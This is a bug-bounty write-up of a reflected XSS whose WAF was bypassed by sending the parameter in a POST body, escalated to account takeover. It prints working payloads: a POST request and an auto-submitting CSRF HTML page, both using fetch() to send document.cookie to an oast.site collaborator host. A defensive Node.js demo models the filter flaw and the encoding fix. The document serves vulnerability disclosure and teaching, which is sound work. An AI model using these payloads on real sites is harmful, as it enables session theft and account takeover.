From RXSS to ATO: Bypassing WAF with a Simple POST Trick
🛡️ Vulnerability Summary:
Severity: Critical
Vulnerability Type: Cross-Site Scripting — Reflected (RXSS)
Impact: Full account takeover of any user
Bounty: $$$$
💬 Description:
While testing a private program (let's call it redacted.com), I discovered a reflected cross-site scripting vulnerability, but the WAF was extremely strict. Apart from a few unusual payloads and plain HTML injection, nothing got through; even ordinary alert(); payloads were blocked. The only payload I could get to execute was:
https://redacted.com/my-account?LastName=hiii" onbeforeinput="alert()
The WAF was strict, but one thing I noticed while testing this application was that it looked home-grown: blocked requests returned a page with the company's own logo and the word "Blocked" rather than a vendor block page. That suggested it might not inspect every part of a request the same way, so I tried changing the request from GET to POST and sending the same parameter in the body of the POST request instead of in the query string:
POST /my-account HTTP/1.1
Host: redacted.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

LastName=hiii%22%20onbeforeinput%3D%22alert()%22
The XSS still worked. I then switched to a payload that was blocked when sent via a GET request, and the WAF never blocked it: the filter was evidently inspecting only the query string and not the POST body, while the application read the parameter from either source. The biggest goldmine, lol. I then changed the payload to one that exfiltrates the victim's cookies to a collaborator host:
POST /my-account HTTP/1.1
Host: redacted.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

LastName=hiii" onbeforeinput="fetch(`https://collab.oast.site?c=`+document.cookie)//
And it worked.
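To make the failure mode concrete, here is an added example in Node.js. It is not the program's WAF or application code; the rule list, the function names and the redacted.example host are assumptions for the demo. It models a filter that inspects only the decoded query string beside one that also inspects form-encoded POST bodies, an application that reads the parameter from either source (which is what makes the bypass work), and the unsafe attribute reflection beside its attribute-encoded fix, which is the real remediation since a WAF is only a mitigation:

```javascript
// Added illustration (not the program's real WAF or application code): a
// query-string-only filter versus one that checks every parameter source,
// beside the unsafe reflection and its attribute-encoded fix. The rule list,
// function names and sample host are assumptions for the demo.

// Crude signature rules of the kind a strict WAF applies to a parameter value.
const RULES = [
  /<\s*script/i,       // script tag
  /\bon[a-z]+\s*=/i,   // any on* event-handler attribute (onbeforeinput, onerror, ...)
  /javascript\s*:/i,   // javascript: URL scheme
  /\bfetch\s*\(/i,     // exfiltration primitive
];
const matchesRule = (value) => RULES.some((re) => re.test(value));

// Weak WAF: only the decoded query string is inspected. The body argument is
// deliberately ignored, so a parameter moved into a form-encoded POST body
// is never seen by the rules.
function wafQueryOnly(urlString, body = "") {
  const url = new URL(urlString);
  return [...url.searchParams.values()].some(matchesRule) ? "Blocked" : "Allowed";
}

// Fixed WAF: every parameter source the application reads from is checked.
function wafAllSources(urlString, body = "", contentType = "application/x-www-form-urlencoded") {
  const url = new URL(urlString);
  const values = [...url.searchParams.values()];
  if (body && contentType.startsWith("application/x-www-form-urlencoded")) {
    values.push(...new URLSearchParams(body).values());
  }
  return values.some(matchesRule) ? "Blocked" : "Allowed";
}

// The application merges query and body parameters (body wins), which is why
// the same LastName value reaches the template whichever way it is sent.
function getParam(name, urlString, body = "") {
  const fromBody = new URLSearchParams(body).get(name);
  if (fromBody !== null) return fromBody;
  return new URL(urlString).searchParams.get(name);
}

// Vulnerable template: the value lands in a double-quoted attribute unencoded,
// so a quote in the input terminates the attribute and the rest becomes markup.
function renderUnsafe(lastName) {
  return `<input type="text" name="LastName" value="${lastName}">`;
}

// Real fix, independent of any WAF: encode for the HTML attribute context.
function encodeAttr(s) {
  return String(s).replace(/[&<>"'`=]/g, (c) => `&#${c.charCodeAt(0)};`);
}
function renderSafe(lastName) {
  return `<input type="text" name="LastName" value="${encodeAttr(lastName)}">`;
}

// Constructed requests mirroring the write-up: the same payload sent as a GET
// query parameter and as a POST body parameter (host is a placeholder).
const PAYLOAD = 'hiii" onbeforeinput="alert()';
const GET_URL = "https://redacted.example/my-account?LastName=" + encodeURIComponent(PAYLOAD);
const POST_URL = "https://redacted.example/my-account";
const POST_BODY = "LastName=" + encodeURIComponent(PAYLOAD);

// Walk both requests through both filters and both templates.
function demo() {
  const reflected = getParam("LastName", POST_URL, POST_BODY);
  return {
    getViaWeakWaf: wafQueryOnly(GET_URL),              // "Blocked"
    postViaWeakWaf: wafQueryOnly(POST_URL, POST_BODY), // "Allowed": the bypass
    postViaFixedWaf: wafAllSources(POST_URL, POST_BODY),
    unsafeHtml: renderUnsafe(reflected),               // handler attribute injected
    safeHtml: renderSafe(reflected),                   // quote stays inside the value
  };
}

console.log(demo());
```

Run it with node: the weak filter reports Blocked for the GET and Allowed for the identical POST, the source-agnostic filter blocks both, and the encoded template keeps the injected quote from terminating the attribute, so no onbeforeinput handler is ever emitted.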
I then built a CSRF PoC (an auto-submitting cross-site form, since the vulnerable request is now a POST) and opened it in my other browser, role-playing the victim:
<!DOCTYPE html>
<html>
<head><title>PoC</title></head>
<body>
<form action="https://www.redacted.com/my-account?status=find" method="POST">
<input type="hidden" name="LastName" value='" onbeforeinput=fetch(`https://19bhju56jldflt1iyqrwetlkqjqx2tpmb.oast.site?c=`+document.cookie)//'>
<input type="hidden" name="ConfirmationNumber" value="[None-of-ur-business]">
<input type="submit">
</form>
<script>document.forms[0].submit();</script>
</body>
</html>
And it worked! One of the best WAFs I have ever seen, lol. Note that onbeforeinput fires when the user edits the field, so the payload executes as soon as the victim types into the injected LastName input on the reflected page.
After reporting this issue I was awarded a $$$$ bounty.